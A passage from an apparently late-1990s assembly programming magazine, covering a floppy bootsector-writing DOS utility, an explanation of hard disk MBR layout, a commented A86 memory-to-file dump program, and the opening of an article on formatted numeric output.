          db    'CoPyRiGhT=CopyLeft 1999, Jan Verhoeven, '
          db    'jverhoeven@...', 0
; ----------------------
filename db    'BootLoad.bin', 0        ; name of file to send to disk

Mess001  db    'Cannot open file BootLoad.bin. '
          db    'Operation aborted.', cr, lf
Len001 = $ - Mess001

Mess002  db    'Something went wrong while writing to disk.', cr, lf
Len002 = $ - Mess002

Mess003  db    'The floppy disk subsystem reported an error. '
          db    'Trying once more.', cr, lf
Len003 = $ - Mess003

Mess004  db    cr, lf, 'Bootsector written. '
          db            'Thank you for using this software.'
          db    cr, lf, 'This program is GNU GPL free software and you use '
          db            'it at your own risk.'
          db    cr, lf, 'Please study the GNU '
          db            'General Public License for more details.', cr, lf
Len004 = $ - Mess004
; ----------------------
Error1:  mov   dx, offset mess001   ; process "cannot open file"
          mov   cx, len001
          mov   bx, stdout
          mov   ah, 040
          int   021                  ; print via DOS

          mov   ax, 04C01            ; exit with errorcode = 1
          int   021
; ----------------------
Error2:  mov   dx, offset mess002   ; process "disk error"
          mov   cx, len002
          mov   bx, stdout
          mov   ah, 040
          int   021                  ; via DOS

          mov   ax, 04C02            ; exit with errorcode = 2
          int   021
; ----------------------
Error2a: push  ax, bx, cx, dx       ; process "Disk not ready"
          mov   dx, offset mess003   ; point to message
          mov   cx, len003           ; this many bytes
          mov   bx, stdout           ; to the console
          mov   ah, 040              ; do a write
          int   021                  ; via DOS
          pop   dx, cx, bx, ax       ; restore state of machine
          ret                        ; and return to caller
; ----------------------
main:    mov   dl, 0                ; choose drive A:
          mov   ah, 0                ; select function 0 ...
          int   013                  ; ... reset diskdrives

          mov   dx, offset filename  ; point to name of file
          mov   ax, 03D00            ; to open
          int   021                  ; via DOS
          jc    Error1               ; if error, take action

          mov   [Handle], ax         ; no error, => ax = handle
          mov   dx, offset buffer    ; setup pointer, ...
          mov   cx, 512              ; ... byte count, ...
          mov   bx, ax               ; ... and handle
          mov   ah, 03F              ; to read data from file
          int   021                  ; via DOS

          mov   bx, [Handle]
          mov   ah, 03E
          int   021                  ; close this file

          mov   cx, 5                ; prepare for a five times LOOP
L0:      push  cx
          mov   bx, offset buffer
          mov   es, ds               ; es:bx = buffer to read from
          mov   dx, 0000             ; drive A:, head 0
          mov   cx, 0001             ; Track 0, Sector 1
          mov   ax, 0301             ; Write sectors, 1 sector
          int   013                  ; via BIOS
          jnc   >L1                  ; if no error, jump forward
          pop   cx                   ; Houston, we have an error!
          call  error2a              ; inform the user
          loop  L0                   ; and try again
          jmp   error2               ; after five times still no go....
                                     ; (JMP, not JC: the DOS write inside
                                     ; error2a has changed the carry flag)

L1:      mov   dx, offset Mess004   ; Signal that we're successful
          mov   cx, Len004
          mov   bx, stdout           ; to the console
          mov   ah, 040
          int   021                  ; via DOS (so it can be redirected)
          mov   ax, 04C00            ; mention that there were no errors
          int   021                  ; and return to DOS

----------- Wrs.A86 ---------------------------------------- End ----------
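
The three register loads before INT 013 pack five small numbers into AX, CX
and DX. The C sketch below shows the packing for the BIOS "write sectors"
function. The struct and the function name are made up, and only cylinders
below 256 are handled, which is plenty for a floppy.

```c
#include <stdint.h>

typedef struct { uint16_t ax, cx, dx; } DiskRegs;

/* Pack an INT 13h "write sectors" request (AH = 03h).
   On disks with more than 256 cylinders the two top cylinder bits go
   into bits 6-7 of CL; this sketch leaves them at zero. */
static DiskRegs pack_write_request(uint8_t drive, uint8_t cylinder,
                                   uint8_t head, uint8_t sector,
                                   uint8_t count)
{
    DiskRegs r;
    /* AH = function number, AL = number of sectors */
    r.ax = (uint16_t)((0x03u << 8) | count);
    /* CH = cylinder, CL = sector number (counted from 1) */
    r.cx = (uint16_t)(((unsigned)cylinder << 8) | (sector & 0x3Fu));
    /* DH = head, DL = drive (0 = A:, 080 hex = first hard disk) */
    r.dx = (uint16_t)(((unsigned)head << 8) | drive);
    return r;
}
```

For drive A:, track 0, head 0, sector 1 and one sector this gives AX = 0301,
CX = 0001 and DX = 0000 (all hex), the values used in the listing.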

Have fun experimenting with bootsectors. But take care that this will NOT
work on a hard disk.


Hard disk structure.
--------------------
A hard disk uses another layout for its structure. The very first sector
of a HDD is the MBR (Master BootRecord). It is the only sensible sector in
the first track of a normal HDD. The rest is just empty.

Partitions start on a track boundary. By convention the first one starts at
cylinder 0, head 1, sector 1, right after that mostly empty first track. The
very first sector of a bootable partition is the bootsector.

The MBR contains the partition table, indicating where partitions start and
end and whether they are bootable or not. Plus some code to interpret that
table and to find the bootsector that was selected.
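
As an illustration of what the MBR code has to interpret, the C sketch below
looks for the bootable entry in a 512 byte MBR image. It relies on the classic
layout: four entries of 16 bytes starting at offset 446 (01BE hex), a status
byte of 080 hex for the bootable one, and the signature bytes 055 hex and
0AA hex at the end of the sector. The names are made up for the example.

```c
#include <stdint.h>

enum {
    MBR_SIZE         = 512,
    MBR_TABLE_OFFSET = 446,   /* 0x1BE: first of four 16-byte entries */
    MBR_ENTRY_SIZE   = 16,
    MBR_ENTRIES      = 4,
    MBR_ACTIVE_FLAG  = 0x80   /* status byte of a bootable entry */
};

/* Returns the index (0..3) of the first bootable entry, -1 if there is
   none, or -2 if the sector does not end in the 55h AAh signature. */
static int mbr_find_active(const uint8_t sector[MBR_SIZE])
{
    int i;
    if (sector[510] != 0x55 || sector[511] != 0xAA)
        return -2;
    for (i = 0; i < MBR_ENTRIES; i++) {
        if (sector[MBR_TABLE_OFFSET + i * MBR_ENTRY_SIZE] == MBR_ACTIVE_FLAG)
            return i;
    }
    return -1;
}
```

A floppy bootsector written over the MBR replaces this table with its own
code and data, and the partitions can no longer be located.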


If you write a floppy disk bootsector to the very first sector of a HDD,
you wipe out the MBR and hence make all data on that disk inaccessible. The
data will still be there, but the system will no longer be able to find
or use it.

So please take care that this software is NOT used for drive (DL=) 080.

jverhoeven@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                          Dumping Memory To Disk
                                                          by Jan Verhoeven


This piece of code allows you to make a memory dump of any region of
conventional memory (i.e. below 1 Mb) to a diskfile.
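
The arithmetic behind such a dump is simple, and a C sketch may help before
diving into the source. A real mode address is segment times 16 plus offset,
and the Blocks and Rest variables in the listing suggest that the region is
written out in 16K pieces. The function names are made up, and treating the
stop address as one past the last byte is an assumption of this sketch.

```c
#include <stdint.h>

enum { CHUNK = 16 * 1024 };   /* size of one output block */

/* Linear address of a real mode segment:offset pair. */
static uint32_t linear_address(uint16_t segment, uint16_t offset)
{
    return ((uint32_t)segment << 4) + offset;
}

typedef struct { uint32_t blocks; uint32_t rest; } DumpPlan;

/* Split the region [start, stop) into whole 16K blocks plus a remainder.
   `stop` is taken to be one past the last byte (an assumption). */
static DumpPlan plan_dump(uint32_t start, uint32_t stop)
{
    DumpPlan p;
    uint32_t length = stop > start ? stop - start : 0;
    p.blocks = length / CHUNK;
    p.rest   = length % CHUNK;
    return p;
}
```

For example, 0B800:0000 is linear address 0B8000 hex, and a region of 09000
hex bytes splits into 2 blocks of 16K plus a rest of 4096 bytes.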


The program itself.
-------------------
The source is documented so it speaks for itself. At points of
interest I have inserted "break" and "restart" lines with space for
additional remarks.

So just read the source and read the remarks. This way, the text is
where the code is, and you don't need to go back and forth in the
text. I think this will be easier to read than explanation afterwards.


--- Mem2File ------------------------------------------------- Start ---

name     mem2file
title    Send an area of memory to a diskfile.
page     80, 120

; version 1.0 : Had to be compiled for each area/filename   OK: 01-01-1991
; version 1.1 : Same as above, for A86 format               OK: 01-01-1999
; version 1.2 : Make it commandline driven                  OK: 01-02-1999
; version 1.3 : Make it reliable                            OK: 02-02-1999
; ----------------------
stdout   =  1
tab      =  9
lf       = 10
cr       = 13

clr MACRO               ; macro called CLeaR
     mov  #1, 0          ; move it with zero
     #EM                 ; and get outa here

Dum1   STRUC            ; a structure definition
OffVal   dw    ?
SegVal   dw    ?
        ENDS
; ----------------------
   DATA segment          ; this is where the volatile data lives

ByteF = $
dummy    db    ?        ; just to fool D86....
                         ; if this dummy variable is not here, D86 will
                         ; reference variable "Start" as "ByteF".
          even
Start    dw    ?, ?     ; segment:address to start
Stop     dw    ?, ?     ; segment:address to stop
Blocks   dw    ?        ; number of 16K chunks to save
Rest     dw    ?        ; remaining part to save
ArgNum   dw    ?        ; nr of bytes in this argument
OldClp   dw    ?        ; current pointer into command line
Handle   dw    ?
Length   dw    ?, ?

FileName:                       ; this storage is used twice....
Argument db     80 dup (?)      ; storage for next argument from command-line
Output   db    16K dup (?)      ; buffered output

--- Mem2File ------------------------------------------------- Break ---

An A86 enhancement: if you need 16K elements of data, just ask for it.
No need to remember that 16 Kb is 16,384 bytes. The "K" will do.

No big deal, just a nice feature.

Also, if you need to process large binary numbers you may group them
into sub-units separated by underscores. So the number:

         1000100100111101

is hard to read back. But if we insert "_" markers like:

         1000_1001_0011_1101

the grouping of bits makes them easier to understand. Not that it is a
matter of life and death, but it can come in handy once in a while.
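
What the assembler has to do with such a grouped number is easy to show in C.
The sketch below only models the idea of skipping the "_" markers; it says
nothing about how A86 itself is implemented, and the function name is made
up.

```c
#include <stdint.h>

/* Parse a binary number that may contain '_' separators, for example
   "1000_1001". Returns 0 on success and stores the value in *out.
   Returns -1 on any other character, on an empty number, or on more
   than 32 binary digits. */
static int parse_grouped_binary(const char *text, uint32_t *out)
{
    uint32_t value = 0;
    int digits = 0;
    for (; *text != '\0'; text++) {
        if (*text == '_')
            continue;                 /* separators carry no value */
        if (*text != '0' && *text != '1')
            return -1;
        if (++digits > 32)
            return -1;
        value = (value << 1) | (uint32_t)(*text - '0');
    }
    if (digits == 0)
        return -1;
    *out = value;
    return 0;
}
```

Both spellings of the number above give the same value, 893D hex, which is
much easier to verify from the grouped form.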

--- Mem2File ------------------------------------------------ Restart --

Bytes = $ - ByteF               ; number of volatile databytes
; ----------------------
   CODE segment                  ; no ORG, so we start at 0100

          jmp   main

HexTable db    '0123456789ABCDEF', 0

          db    'VeRsIoN=Mem2File 1.3', 0
          db    'CoPyRiGhT=CopyLeft Jan Verhoeven, jverhoeven@...', 0

Mess001  db    'Mem2File collects a part of conventional memory and '
          db    'sends it to a file.', cr, lf, lf
          db    'The syntax is:', cr, lf, lf
          db    tab, 'Mem2File  segm1:offs1 [-] segm2:offs2 '
          db    '<path>file.ext.', cr, lf, lf
          db    'Mem2File is GNU GPL style FREE software. ', cr, lf
          db    'Please read the GNU GPL if you are in doubt.', cr, lf, lf

Mess002  db    'Mem2File was made by Jan Verhoeven, NL-5012 GH 272, '
          db    'The Netherlands', cr, lf
          db    'E-mail address : jverhoeven@...', cr, lf, lf
Len001 = $ - Mess001
Len002 = $ - Mess002

Mess004  db    7, 'Error! All numbers are expected to be hexadecimal.'
          db    cr, lf
Len004 = $ - Mess004
;------------------------
InitMem: mov   di, ByteF        ; Init volatile memory with zero's.
          mov   cx, Bytes        ; saves a lot of strange problems.
          mov   al, 0
          rep   stosb
          ret
;------------------------
--- Mem2File ------------------------------------------------- Break ---

I use volatile data to store data that does not need initialising. This
saves a lot of disk space and the program loads a lot faster. The drawback
of volatile data is that any rubbish left there by other programs can make
your software go berserk if you forget to initialise the data yourself.

Therefore I -always- prime the volatile data memory with zeros, just to
have a well-defined starting position.

It should not be necessary but, on the other hand, how much overhead and
extra execution time does such an initialisation routine really cost?

--- Mem2File ------------------------------------------------ Restart --

L0:      mov   b [di], 0        ; terminate argument string
          mov   [OldClp], si     ; done, => clean up.
          clc                    ; indicate "No Error"
L3:      pop   di, si, ax       ; restore registers, ...
          ret                    ; ... and leave.

GetArg:  push  ax, si, di       ; get next argument from command-line in ASCIIZ format
          mov   si, [OldClp]     ; now, where did we leave last time?
          cmp   si, 0            ; Have we ever used this routine?
          IF  E mov  si, 081             ; if not, prime SI, ...
          mov   di, offset Argument      ; ... DI and ...
          mov   [ArgNum], 0              ; ... nr of chars in argument.
L1:      lodsb                  ; get byte
          cmp   al, ' '          ; skip over spaces, ...
          je    L1
          cmp   al, tab          ; ... and tabs.
          je    L1
          cmp   al, 1            ; ONLY if AL is 0, we get a carry
          jc    L3               ; if CARRY, we're done

--- Mem2File ------------------------------------------------- Break ---

This construction is what I particularly like. I want to check if AL is
Zero. Normally you can code

          cmp   al, 0
          jz    L3

but L3 is the error-exit and needs the carrybit to be set as an error
flag. Normally you would enter a

          stc

instruction to fulfil the specification. But that is poor programming.
It is better to let the software do this for us.

AL can have any value between 020 and 0FF, plus 00, tab, lf and cr. 01
is not an option. So the sequence

          cmp   al, 1            ; ONLY if AL is 0, we get a carry
          jc    L3               ; if CARRY, we're done

will send us to the errorexit WITH the carryflag set, all in one,
without explicitly having to set the carry flag.
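
The reasoning can be checked outside the assembler. The sketch below, in
C, models only the carry flag of a CMP: the instruction subtracts the
operand from AL and sets carry on an unsigned borrow. The function name
carry_after_cmp is an assumption made for this illustration.

```c
#include <stdint.h>
#include <stdbool.h>

/* Model of the carry flag after "cmp al, imm8": CMP computes al - imm8
   and sets carry when an unsigned borrow occurs, i.e. when al < imm8. */
bool carry_after_cmp(uint8_t al, uint8_t imm8)
{
    return al < imm8;
}
```

With an operand of 1 the only value of AL that is smaller is 0, so a
single compare both detects the end of the string and leaves the carry
flag set for the caller.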

--- Mem2File ------------------------------------------------ Restart --

L2:      stosb                  ; else store char in Arguments array
          inc   [ArgNum]         ; adjust counter
          lodsb                  ; and get next char
          cmp   al, ' '          ; is it a delimiting space?
          je    L0
          cmp   al, tab          ; or a tab?
          je    L0
          cmp   al, ':'          ; or a colon?
          je    L0
          cmp   al, 0            ; or an end-of-line?
          jne   L2               ; if not, loop back,
          mov   si, 0FFFF        ; else make SI ridiculously high, ...
          stc                    ; ... set carry flag (L0 clears it again), ...
          jmp   L0               ; and get out.

--- Mem2File ------------------------------------------------- Break ---

Ok, ok, ok. I was influenced to make this function by a compiler. No, it
wasn't C. It was Modula-2.

GetArg (if necessary A86 can operate in a case sensitive mode!) extracts
the next argument from the command tail. It puts it in a separate buffer
at address "Argument" which can hold 80 bytes. That should be more than
enough for one word or expression.
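
For comparison, here is roughly what GetArg does, written as a C sketch.
It follows the listing as far as I can read it: blanks are skipped, the
first character is always stored, and a space, tab, colon or the end of
the tail closes the argument. The names ArgCursor and get_arg are
hypothetical, and unlike the listing the sketch simply parks the cursor
on the terminating zero instead of loading 0FFFF.

```c
#include <stddef.h>
#include <stdbool.h>

/* Hypothetical cursor type standing in for the OldClp variable. */
typedef struct {
    const char *next;   /* where the previous call stopped */
} ArgCursor;

/* Copy the next argument from the command tail into out (capacity cap).
   Returns false when only blanks are left, the case the listing reports
   through the carry flag. */
bool get_arg(ArgCursor *cur, char *out, size_t cap)
{
    const char *p = cur->next;
    size_t n = 0;

    if (cap == 0)
        return false;
    while (*p == ' ' || *p == '\t')     /* skip leading blanks */
        ++p;
    if (*p == '\0')
        return false;                   /* nothing left */

    /* store the first character, then copy up to a delimiter */
    do {
        if (n + 1 < cap)
            out[n++] = *p;
        ++p;
    } while (*p != '\0' && *p != ' ' && *p != '\t' && *p != ':');

    out[n] = '\0';                      /* terminate argument string */
    if (*p != '\0')
        ++p;                            /* step over the delimiter */
    cur->next = p;
    return true;
}
```

Called repeatedly on a tail such as " 1234:0010 - 2000:FFFF dump.bin" it
hands back the two halves of each address, the dash, and the file name,
one per call.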

--- Mem2File ------------------------------------------------ Restart --

;------------------------
L1:      stc                    ; byte not in table!
          pop   dx               ; POP leaves the carry flag alone
          ret                    ; exit

L2:      sub   bx, dx           ; calculate position in table
          pop   dx
          clc                    ; make sure carry is cleared
          ret

--- Mem2File ------------------------------------------------- Break ---

This is a typical A86 construction. The subroutine is called TableFind
and it starts in the next line and ends in the previous one!

This is done to have the local labels declared for when they are needed
in the main functionbody. All jumps are "backward". For the CPU there's
no big influence, but for the assembler there is. No guessing about
labels.
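
Stripped of the label ordering, TableFind is a plain linear search. A
minimal C sketch of the same idea follows; the name table_find is an
assumption, and the return value -1 stands in for "carry set", since C
has no flags to return.

```c
#include <stdint.h>

/* Look for byte al in the zero-terminated table. Returns the index of the
   first match, or -1 where the assembly version returns with carry set. */
int table_find(uint8_t al, const char *table)
{
    for (int i = 0; table[i] != '\0'; ++i) {   /* end of table? */
        if ((uint8_t)table[i] == al)           /* compare byte with table */
            return i;                          /* position in table */
    }
    return -1;                                 /* byte not in table */
}
```

Because the end-of-table test comes first, the terminating zero itself
can never be "found", just as in the listing.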

--- Mem2File ------------------------------------------------ Restart --

TableFind:                      ; find AL in ASCIIZ table [BX] ...
          push  dx               ; ... and report position
          mov   dx, bx           ; keep start of table (BX)
L0:      cmp   b [bx], 0        ; is it end of table?
          je    L1               ; if so, jump out
          cmp   al, [bx]         ; compare byte with table
          je    L2               ; if same, jump out
          inc   bx               ; else increment pointer
          jmp   L0               ; and loop back
;------------------------
MakeUpper:
          cmp   al, 'a'          ; too low?
          jb    ret

--- Mem2File ------------------------------------------------- Break ---

An A86 enhancement: a conditional return instruction. All sensible CPUs
have conditional CALL and RET instructions. Not the 80x86 line. This CPU
was meant to be structured.

So you have to put a conditional jump before the CALL or RET, and
introduce yet another silly labelname for the next instruction.

The  "Jcc   ret"  is a good way to circumvent this omission. What it
does is the same as what, on a Z-80, would be done with a  "RET  cc"
instruction.

There is one catch, however: there must be a RET instruction within
reach PRIOR to the "Jcc   Ret" (internal) macro.

If that is a problem, you could also use the line:

         IF cc  Ret

So either way you, the programmer, win.

--- Mem2File ------------------------------------------------ Restart --

          cmp   al, 'z'          ; if in range, ...
          ja    ret
          and   al, not bit 5    ; ... make uppercase

--- Mem2File ------------------------------------------------- Break ---

A86 is very programmer-oriented and allows us to write down what and how
we think. So if I need to set bit 0 of register Ax, I will simply write

          or    ax, bit 0

Any value between 0 and 15 is valid in A86 (0 - 31 for A386) to refer to
the respective bit in the respective source.
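
In a high level language the two conditional returns and the bit
operator of MakeUpper come out as follows. This is a sketch in C, not
A86 output; the macro BIT is a made-up stand-in for the A86 "bit"
operator and make_upper is a hypothetical name.

```c
#include <stdint.h>

#define BIT(n) (1u << (n))   /* hypothetical stand-in for A86's "bit n" */

/* Convert a lower case ASCII letter to upper case, leave the rest alone. */
uint8_t make_upper(uint8_t al)
{
    if (al < 'a')
        return al;                   /* jb ret */
    if (al > 'z')
        return al;                   /* ja ret */
    return al & (uint8_t)~BIT(5);    /* and al, not bit 5 */
}
```

Bit 5 is the only difference between 'a'..'z' and 'A'..'Z' in ASCII,
which is why clearing it is enough.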

--- Mem2File ------------------------------------------------ Restart --

          ret
;------------------------
BadNumber:                      ; hey typo, you made a dumbo!
          mov   dx, offset Mess004
          mov   cx, Len004
          mov   bx, StdOut
          mov   ah, 040
          int   021

          mov   ax, 04C02        ; and exit with errorcode 2
          int   021
;------------------------
SyntErr: mov   dx, offset Mess001
          mov   cx, Len001
          mov   bx, StdOut
          mov   ah, 040          ; print out "help" screen and ...
          int   021

          mov   ax, 04C01        ; ... exit with errorcode 1
          int   021
;------------------------
L8:      mov   ax, dx           ; Convert has result in DX, that's why.
          pop   dx, bx
          ret

Convert: push  bx, dx           ; convert ASCII to Hex.
          mov   si, offset Argument
          clr   dx               ; dx will contain result

--- Mem2File ------------------------------------------------- Break ---

Here the macro is invoked. It is used to load the DX register with
zero. If later you decide to change the way in which you want to clear
registers, just change the macro.

In LST files (the assembler listings) the expansions are controlled by
means of the +L switch. If you issue the option "+L35" macros will not
be expanded in the listings file.

--- Mem2File ------------------------------------------------ Restart --

L1:      lodsb                  ; get first character
          cmp   al, 0            ; end of string?
          je    L8
          call  MakeUpper                ; if not, make uppercase
          mov   bx, offset HexTable
          call  TableFind                ; and lookup in table
          jc    BadNumber
          shl   dx, 4            ; multiply DX by 16

--- Mem2File ------------------------------------------------- Break ---

This is another A86 goody. I coded a  "SHL  DX, 4" instruction, although
I do not know what the target processor will be.

No problem with A86. It will find out with which CPU you are assembling
and use that. If your CPU supports this function, it is implemented as
such. If it doesn't, this instruction is expanded as a macro into the
following:

          shl   dx, 1
          shl   dx, 1
          shl   dx, 1
          shl   dx, 1

More code in the executable, but it makes programming easier.

If on a modern CPU, you can force A86 to act as if the CPU were a
vintage 88 with the commandline switch +P65.
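
To see that the four single shifts do the same job, and how Convert uses
the shift to build a number digit by digit, here is a hedged C sketch.
The names shl4_by_ones and convert_hex are assumptions; the sketch keeps
the 16-bit width of DX, so any digits beyond the fourth push the oldest
ones out, as I believe the listing does too.

```c
#include <stdint.h>
#include <stdbool.h>

/* Shift a 16-bit value left by four using only single-bit shifts,
   the way the expansion for the older CPU does. */
uint16_t shl4_by_ones(uint16_t dx)
{
    for (int i = 0; i < 4; ++i)
        dx = (uint16_t)(dx << 1);
    return dx;
}

/* Hypothetical C rendering of Convert: ASCII hex string to 16-bit value.
   Returns false where the listing jumps to BadNumber. */
bool convert_hex(const char *arg, uint16_t *result)
{
    static const char hex_table[] = "0123456789ABCDEF";
    uint16_t dx = 0;                          /* dx will contain result */

    for (; *arg != '\0'; ++arg) {
        char c = *arg;
        int index = -1;

        if (c >= 'a' && c <= 'z')
            c = (char)(c & ~0x20);            /* MakeUpper */
        for (int i = 0; hex_table[i] != '\0'; ++i) {
            if (hex_table[i] == c) {          /* TableFind */
                index = i;
                break;
            }
        }
        if (index < 0)
            return false;                     /* not a hex digit */
        dx = (uint16_t)(shl4_by_ones(dx) | (uint16_t)index);
    }
    *result = dx;
    return true;
}
```

Since the low nibble is always empty after the shift, the OR is as good
as an ADD here.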

--- Mem2File ------------------------------------------------ Restart --

          or    dl, bl           ; bx = index into table
          jmp   L1               ; repeat until done
;------------------------
Credits: mov   dx, offset Mess002
          mov   cx, Len002
          mov   bx, stdout
          mov   ah, 040
          int   021              ; print some egotripping data
          ret
;------------------------

main:    call  InitMem          ; prime volatile data
          mov   al, [080]        ; get tail length
          cbw                    ; make 16 bits long
          mov   si, 081          ; point to start of tail
          add   si, ax           ; point to end of tail
          mov   [si], ah         ; make commandtail ASCIIZ
          call  GetArg           ; get argument from command tail
          jc    SyntErr          ; if error, get out
          call  Convert                  ; convert text to hex
          mov   [Start.SegVal], ax       ; store it
          call  GetArg                   ; etcetera
          jc    SyntErr
          call  Convert
          mov   [Start.OffVal], ax

L0:      call  GetArg
          jc    SyntErr
          cmp   b [Argument], '-'        ; single '-' character?
          je    L0                       ; if so, ignore it
          call  Convert
          mov   [Stop.SegVal], ax
          call  GetArg
          jc    SyntErr
          call  Convert
          mov   [Stop.OffVal], ax

          call  GetArg
          IF  C jmp  SyntErr

--- Mem2File ------------------------------------------------- Break ---

This is one of the A86 enhancements. This IF construct saves you from
having to make up all kinds of ridiculous labelnames like jmp_01F in a
construct as follows:

          call  GetArg
          jnc   jmp_01F
          jmp   SyntErr
jmp_01F: ...

The IF construct (not to be confused with the "#IF" construct which is
for conditional assemblies) lets you state the condition as you would in
a high level language; A86 itself generates the short jump with the
reverse condition around the instruction:

          IF  C jmp  SyntErr

Neat, isn't it?

--- Mem2File ------------------------------------------------ Restart --

          mov   si, offset Argument
          add   si, [ArgNum]
          mov   b [si], 0                ; make it ASCIIZ

          mov   dx, offset FileName      ; same as Argument buffer....
          mov   cx, 0
          mov   ah, 03C
          int   021                      ; create the file
          IF  C jmp  SyntErr

--- Mem2File ------------------------------------------------- Break ---

See how powerful the IF construct can be? It is a very convenient way to
circumvent the foolish conditional instructions of the x86 architecture.

--- Mem2File ------------------------------------------------ Restart --

          mov   [Handle], ax

          mov   ax, [Stop.SegVal]
          mov   dx, 0                    ; prime DX
          mov   cx, 4
L0:      shl   ax, 1
          rcl   dx, 1
          loop  L0                       ; shift upper 4 bits of address into DX
          add   ax, [Stop.OffVal]
          adc   dx, 0                    ; now, dx:ax = linear address to stop at
          mov   [Stop.SegVal], dx
          mov   [Stop.OffVal], ax        ; store linear address STOP

          mov   ax, [Start.SegVal]
          mov   dx, 0                    ; prime DX
          mov   cx, 4
L0:      shl   ax, 1
          rcl   dx, 1
          loop  L0                       ; shift upper 4 bits of address into DX
          add   ax, [Start.OffVal]
          adc   dx, 0                    ; now, dx:ax = linear address to start from
          mov   [Start.SegVal], dx
          mov   [Start.OffVal], ax       ; store linear address START

          cmp   dx, [Stop.SegVal]        ; start > stop?
          ja    >L1                      ; fix it!
          jb    >L2

--- Mem2File ------------------------------------------------- Break ---

A86 likes to have as many labels as possible declared before they are
referenced. That's why many times there is code "before" the subroutine
name is declared.

For local labels (i.e. labels that consist of 1 letter and the rest
decimal digits) it is a MUST that they are defined before being
referenced.

If, for some reason, you do not want to put a label backwards in memory,
you can forward reference a local label by prefixing it with a ">" sign.
A86 now knows that the local label still has to come. Not a luxury since
many A86 programmers can do with 4 or 5 local labels in over 2000 lines
of code.... Especially L0 is always very well available.
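
Labels aside, the arithmetic in the listing around this break is worth a
second look: each segment:offset pair is folded into one linear address
(segment times 16 plus offset, kept in DX:AX), and the two addresses are
swapped if start lies above stop. A small C sketch of just that
arithmetic, with the made-up names linear_address and order_range:

```c
#include <stdint.h>

/* Fold a real-mode segment:offset pair into a linear address:
   segment * 16 + offset, at most 0x10FFEF. */
uint32_t linear_address(uint16_t segment, uint16_t offset)
{
    return ((uint32_t)segment << 4) + offset;
}

/* Hypothetical helper mirroring the start > stop check: order the two
   linear addresses so that *start <= *stop afterwards. */
void order_range(uint32_t *start, uint32_t *stop)
{
    if (*start > *stop) {
        uint32_t tmp = *start;
        *start = *stop;
        *stop = tmp;
    }
}
```

The 8086 has no 32-bit registers, which is why the listing needs the
SHL/RCL pair and ADC where C gets away with one shift and one add.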

--- Mem2File ------------------------------------------------ Restart --

          cmp   ax, [Stop.OffVal]        ; start > stop?
          jbe   >L2                      ; if not, OK
L1:      push  [Stop.SegVal]
          push  [Stop.OffVal]            ; swap start and stop addresses
          mov   [Stop.SegVal], dx
          mov   [Stop.OffVal], ax
          pop   [Start.OffVal]
          pop   [Start.SegVal]

L2:      mov   dx, [Stop.SegVal]
          mov   ax, [Stop.OffVal]
          add   ax, 1
          adc   dx, 0                    ; limits are INCLUSIVE
          sub   ax, [Start.OffVal]
          sbb   dx, [Start.SegVal]       ; dx:ax = bytes to move

          shl   ax, 1
          rcl   dx, 1
          shl   ax, 1
          rcl   dx, 1                    ; dx = nr of 16 Kb blocks to move
          mov   [Blocks], dx             ; store it
          shr   ax, 2                    ; ax = remainder to move
          mov   [Rest], ax               ; save it

          mov   ax, [Start.SegVal]       ; end of linear addressing, we're going to DOS!
          mov   cl, 12
          shl   ax, cl
          mov   [Start.SegVal], ax

          mov   es, ds           ; use es to refer to data
          mov   bx, [Handle]
          lds   dx, d [Start]

--- Mem2File ------------------------------------------------- Break ---

Normally this instruction would require a secretary with 100 letters per
minute typing rate:

          lds   dx, dword ptr [Start]

But the "ptr" argument is always the same, so it is only there to please
the assembler and humiliate the programmer: entering data that nobody
needs.

Therefore A86 only needs the first letter of such prose. In our case:
the "dword ptr" is abbreviated to a "d". "Byte ptr" is a "b". "Word Ptr"
is a "w". Simple as that.

So if your coding skills outweigh your typing speed, you should consider
switching to the superior assembler. :)
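
The shifts that lead up to this LDS are easy to lose track of, so here
is the same bookkeeping as a C sketch: the inclusive byte count is split
into full 16 KB blocks plus a remainder, and the linear start address is
turned back into a segment:offset pair that DOS can use. The names
Split, split_range and to_seg_off are hypothetical, and the sketch
assumes addresses below 1 MB.

```c
#include <stdint.h>

enum { BLOCK_SIZE = 16 * 1024 };    /* the 16K loaded into CX per write */

/* Hypothetical result type: the listing keeps these in [Blocks] and [Rest]. */
typedef struct {
    uint16_t blocks;    /* number of full 16 KB blocks */
    uint16_t rest;      /* bytes left over, 0 .. 16383 */
} Split;

/* Both limits are inclusive, hence the +1. */
Split split_range(uint32_t start, uint32_t stop)
{
    uint32_t bytes = stop + 1 - start;
    Split s;
    s.blocks = (uint16_t)(bytes / BLOCK_SIZE);   /* upper bits, via 2 x SHL/RCL */
    s.rest   = (uint16_t)(bytes % BLOCK_SIZE);   /* lower 14 bits */
    return s;
}

/* Turn a linear address below 1 MB back into segment:offset the way the
   listing does: the high nibble goes into bits 12..15 of the segment. */
void to_seg_off(uint32_t linear, uint16_t *segment, uint16_t *offset)
{
    *segment = (uint16_t)((linear >> 16) << 12);
    *offset  = (uint16_t)(linear & 0xFFFF);
}
```

A range of 40000 bytes, for instance, comes out as 2 blocks and a rest
of 7232 bytes.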

--- Mem2File ------------------------------------------------ Restart --

       es cmp   [Blocks], 0      ; if less than 16 Kb, skip this one.

--- Mem2File ------------------------------------------------- Break ---

For people who still remember that  "Seg  ES"  is a legal instruction
(used for a segment override) this might bring back memories.

A86 allows the user to put the segmentation override before the actual
instruction. This way, the operand field looks neater. And it is also
the way in which D86 shows segmentation overrides.

--- Mem2File ------------------------------------------------ Restart --

          je    >S0
          mov   cx, 16K
L0:      mov   ah, 040
          int   021
          mov   ax, ds           ; store ds into ax
          add   dx, 04000        ; next buffer to load data from
          IF  C add  ax, 01000   ; if carry, inc ds
          mov   ds, ax           ; ds:dx now ready for next bufferfull of data

       es dec   [Blocks]
          jnz   L0

S0:   es cmp   [Rest], 0
          je    >L1
          mov   ah, 040
       es mov   cx, [Rest]
          int   021
L1:      mov   ds, es

          mov   bx, [Handle]
          mov   ah, 03E
          int   021              ; close file

          call  Credits          ; show my ego
          mov   ax, 04C00
          int   021              ; exit to DOS

--- Mem2File -------------------------------------------------- End ----

That's it.

jverhoeven@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                        Formatted Numeric Output
                                                        by Laura Fairhead


    Here I am going to present you with a very useful routine for numeric
output. I have been using it myself for some time and now I think it is
almost perfect.

    It consists of 2 basic APIs. The first (nuconvs), you call when you
want to change the parameters of the main routine (nuconv). You simply call
it with one DWORD in EAX, which specifies the following:

